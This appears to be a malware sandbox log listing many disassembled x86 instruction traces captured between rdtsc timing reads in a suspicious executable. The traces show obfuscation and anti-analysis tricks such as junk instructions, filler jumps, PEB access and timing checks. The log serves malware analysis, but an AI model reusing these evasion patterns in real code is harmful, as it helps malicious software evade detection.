Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE00A1 second address: 6EE0196 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE1010EA78Eh 0x00000013 and si, F5D8h 0x00000018 jmp 00007FE1010EA78Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FE1010EA796h 0x00000025 and si, 4038h 0x0000002a jmp 00007FE1010EA78Bh 0x0000002f popfd 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 popad 0x00000034 mov eax, dword ptr fs:[00000030h] 0x0000003a jmp 00007FE1010EA794h 0x0000003f sub esp, 18h 0x00000042 jmp 00007FE1010EA790h 0x00000047 xchg eax, ebx 0x00000048 jmp 00007FE1010EA790h 0x0000004d push eax 0x0000004e jmp 00007FE1010EA78Bh 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 mov ecx, 0AD95A4Bh 0x0000005a pushfd 0x0000005b jmp 00007FE1010EA790h 0x00000060 add ecx, 5B6F3F58h 0x00000066 jmp 00007FE1010EA78Bh 0x0000006b popfd 0x0000006c popad 0x0000006d mov ebx, dword ptr [eax+10h] 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FE1010EA790h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0196 second address: 6EE01A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE01A5 second address: 6EE0224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FE1010EA78Eh 0x0000000f push eax 0x00000010 jmp 00007FE1010EA78Bh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov ax, 63DBh 0x0000001b pushfd 0x0000001c jmp 00007FE1010EA790h 0x00000021 sub eax, 4BD765A8h 0x00000027 jmp 00007FE1010EA78Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov esi, dword ptr [770206ECh] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FE1010EA795h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0224 second address: 6EE0234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE100E1706Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0234 second address: 6EE0273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FE1010EA797h 0x0000000f jne 00007FE1010EB5D2h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a call 00007FE1010EA791h 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0273 second address: 6EE0291 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E1706Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, 5801CE10h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0291 second address: 6EE02BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE1010EA78Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE02BA second address: 6EE034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE100E17071h 0x00000009 adc si, CDF6h 0x0000000e jmp 00007FE100E17071h 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c mov dh, 64h 0x0000001e pushfd 0x0000001f jmp 00007FE100E17072h 0x00000024 jmp 00007FE100E17075h 0x00000029 popfd 0x0000002a popad 0x0000002b call dword ptr [76FF0B60h] 0x00000031 mov eax, 7571E5E0h 0x00000036 ret 0x00000037 jmp 00007FE100E1706Eh 0x0000003c push 00000044h 0x0000003e jmp 00007FE100E17070h 0x00000043 pop edi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FE100E1706Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE034F second address: 6EE0355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0355 second address: 6EE0366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE100E1706Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0366 second address: 6EE036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE036A second address: 6EE038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE100E17074h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE038B second address: 6EE0391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0391 second address: 6EE03A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE100E1706Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03A2 second address: 6EE03A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03A6 second address: 6EE03CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b jmp 00007FE100E1706Dh 0x00000010 push dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FE100E1706Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03CF second address: 6EE03D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03D5 second address: 6EE03D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE03D9 second address: 6EE0444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 jmp 00007FE1010EA796h 0x00000016 push dword ptr [eax+18h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FE1010EA798h 0x00000022 jmp 00007FE1010EA795h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0541 second address: 6EE0547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0547 second address: 6EE055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE055A second address: 6EE055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE055E second address: 6EE0564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0564 second address: 6EE05C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 65ADh 0x00000007 movzx esi, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi], edi 0x0000000f pushad 0x00000010 mov si, 141Dh 0x00000014 popad 0x00000015 mov dword ptr [esi+04h], eax 0x00000018 jmp 00007FE100E17078h 0x0000001d mov dword ptr [esi+08h], eax 0x00000020 jmp 00007FE100E17070h 0x00000025 mov dword ptr [esi+0Ch], eax 0x00000028 jmp 00007FE100E17070h 0x0000002d mov eax, dword ptr [ebx+4Ch] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov cx, di 0x00000036 mov si, di 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE05C7 second address: 6EE05DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA791h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE05DC second address: 6EE05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE05E0 second address: 6EE0646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b jmp 00007FE1010EA78Dh 0x00000010 mov eax, dword ptr [ebx+50h] 0x00000013 jmp 00007FE1010EA78Eh 0x00000018 mov dword ptr [esi+14h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007FE1010EA793h 0x00000026 sbb ecx, 709DBC0Eh 0x0000002c jmp 00007FE1010EA799h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0646 second address: 6EE069E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE100E17077h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FE100E17079h 0x0000000f adc cx, 41A6h 0x00000014 jmp 00007FE100E17071h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, dword ptr [ebx+54h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE069E second address: 6EE06A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE06A4 second address: 6EE06DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov ecx, 1B576763h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+18h], eax 0x00000010 pushad 0x00000011 mov bx, ax 0x00000014 mov dx, si 0x00000017 popad 0x00000018 mov eax, dword ptr [ebx+58h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE100E17079h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE06DA second address: 6EE071C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c jmp 00007FE1010EA78Eh 0x00000011 mov eax, dword ptr [ebx+5Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE1010EA797h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE071C second address: 6EE0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0722 second address: 6EE0726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0726 second address: 6EE075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov ax, dx 0x00000010 movsx ebx, ax 0x00000013 popad 0x00000014 mov cx, 8D47h 0x00000018 popad 0x00000019 mov eax, dword ptr [ebx+60h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE100E17074h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE075A second address: 6EE0769 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0769 second address: 6EE07B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c jmp 00007FE100E1706Eh 0x00000011 mov eax, dword ptr [ebx+64h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE100E17077h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE07B3 second address: 6EE07D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE07D9 second address: 6EE07DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE07DF second address: 6EE07F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA791h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE07F4 second address: 6EE080A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+68h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx eax, dx 0x00000011 mov bx, 9E16h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE080A second address: 6EE0821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA793h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0821 second address: 6EE0825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0825 second address: 6EE0861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b jmp 00007FE1010EA795h 0x00000010 mov ax, word ptr [ebx+6Ch] 0x00000014 jmp 00007FE1010EA78Eh 0x00000019 mov word ptr [esi+30h], ax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0861 second address: 6EE087E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE100E17079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE087E second address: 6EE095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f jmp 00007FE1010EA794h 0x00000014 mov word ptr [esi+32h], ax 0x00000018 jmp 00007FE1010EA790h 0x0000001d mov eax, dword ptr [ebx+0000008Ch] 0x00000023 jmp 00007FE1010EA790h 0x00000028 mov dword ptr [esi+34h], eax 0x0000002b jmp 00007FE1010EA790h 0x00000030 mov eax, dword ptr [ebx+18h] 0x00000033 pushad 0x00000034 mov ecx, 69EC083Dh 0x00000039 movzx esi, bx 0x0000003c popad 0x0000003d mov dword ptr [esi+38h], eax 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FE1010EA78Bh 0x00000047 xor eax, 6C997A2Eh 0x0000004d jmp 00007FE1010EA799h 0x00000052 popfd 0x00000053 pushfd 0x00000054 jmp 00007FE1010EA790h 0x00000059 sub ch, FFFFFFA8h 0x0000005c jmp 00007FE1010EA78Bh 0x00000061 popfd 0x00000062 popad 0x00000063 mov eax, dword ptr [ebx+1Ch] 0x00000066 jmp 00007FE1010EA796h 0x0000006b mov dword ptr [esi+3Ch], eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE095E second address: 6EE0962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0962 second address: 6EE0968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0968 second address: 6EE096E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE096E second address: 6EE0972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0972 second address: 6EE0976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0976 second address: 6EE0987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0987 second address: 6EE098B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE098B second address: 6EE0991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0991 second address: 6EE0997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0997 second address: 6EE0A03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f mov ecx, edi 0x00000011 popad 0x00000012 lea eax, dword ptr [ebx+00000080h] 0x00000018 pushad 0x00000019 mov cl, bl 0x0000001b pushfd 0x0000001c jmp 00007FE1010EA790h 0x00000021 and cx, 69F8h 0x00000026 jmp 00007FE1010EA78Bh 0x0000002b popfd 0x0000002c popad 0x0000002d push 00000001h 0x0000002f pushad 0x00000030 jmp 00007FE1010EA794h 0x00000035 popad 0x00000036 push ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE1010EA793h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0A03 second address: 6EE0A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE100E1706Fh 0x00000009 jmp 00007FE100E17073h 0x0000000e popfd 0x0000000f call 00007FE100E17078h 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ecx, 0A93B119h 0x00000023 push ecx 0x00000024 pop edx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0A54 second address: 6EE0A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0A5A second address: 6EE0A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0A5E second address: 6EE0AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1010EA78Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE1010EA793h 0x00000017 jmp 00007FE1010EA793h 0x0000001c popfd 0x0000001d mov ax, C77Fh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0AA4 second address: 6EE0AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE100E17070h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0B91 second address: 6EE0BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 call 00007FE1010EA78Ch 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0BAF second address: 6EE0BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0BB5 second address: 6EE0BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0BB9 second address: 6EE0C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+78h] 0x0000000b pushad 0x0000000c call 00007FE100E17074h 0x00000011 mov si, 6711h 0x00000015 pop esi 0x00000016 mov cx, di 0x00000019 popad 0x0000001a push 00000001h 0x0000001c jmp 00007FE100E17079h 0x00000021 nop 0x00000022 pushad 0x00000023 call 00007FE100E1706Ch 0x00000028 mov si, 0961h 0x0000002c pop ecx 0x0000002d push ebx 0x0000002e mov eax, 5D618399h 0x00000033 pop eax 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov cx, bx 0x0000003c pushfd 0x0000003d jmp 00007FE100E1706Dh 0x00000042 or ecx, 63CFF5E6h 0x00000048 jmp 00007FE100E17071h 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C46 second address: 6EE0C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C4C second address: 6EE0C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C50 second address: 6EE0C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C54 second address: 6EE0C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a movsx ebx, si 0x0000000d pushfd 0x0000000e jmp 00007FE100E1706Eh 0x00000013 and cx, F4B8h 0x00000018 jmp 00007FE100E1706Bh 0x0000001d popfd 0x0000001e popad 0x0000001f lea eax, dword ptr [ebp-08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE100E17075h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\ivHDHq51Ar.exeRDTSC instruction interceptor: First address: 6EE0C9C second address: 6EE0CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1010EA78Ch 0x00000009 rdtsc
